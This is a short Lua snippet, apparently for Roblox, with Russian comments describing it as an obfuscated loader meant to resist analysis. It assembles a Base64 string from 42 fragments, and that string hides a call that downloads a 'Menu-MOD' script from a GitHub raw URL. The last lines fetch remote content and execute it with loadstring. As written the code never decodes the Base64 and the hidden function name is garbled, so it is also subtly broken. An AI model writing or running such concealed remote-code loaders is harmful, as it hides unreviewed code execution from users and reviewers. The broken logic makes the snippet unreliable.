-- Обфусцированный загрузчик (Base64 + защита от простого анализа)
local _=((function() return table.concat end)())local __={}
__[1]="bG9h" __[2]="ZHN0" __[3]="cmlu" __[4]="Zyhn" __[5]="YW1l" __[6]="Okh0" __[7]="dHBy" __[8]="b2N0" __[9]="aWVy" __[10]="KCJo" 
__[11]="dHRw" __[12]="czov" __[13]="L3Jh" __[14]="dy5n" __[15]="aXR1" __[16]="YnVi" __[17]="dXNl" __[18]="cmNv" __[19]="bnRl" __[20]="bnQu" 
__[21]="Y29t" __[22]="L3Nl" __[23]="cmV6" __[24]="YW5l" __[25]="dDIv" __[26]="c2Vy" __[27]="ZXph" __[28]="bmV0" __[29]="Mi1H" __[30]="SVQt" 
__[31]="U0FM" __[32]="TEkv" __[33]="cmVm" __[34]="cy9o" __[35]="ZWFk" __[36]="cy9t" __[37]="YWlu" __[38]="L01l" __[39]="bnUt" __[40]="TU9E" 
__[41]="Iikp" __[42]="KCk="

local ___ = _(__) -- Собираем Base64
local ____ = game.HttpGet(game, ___) -- Загружаем скрипт
assert(loadstring(____))() -- Выполняем
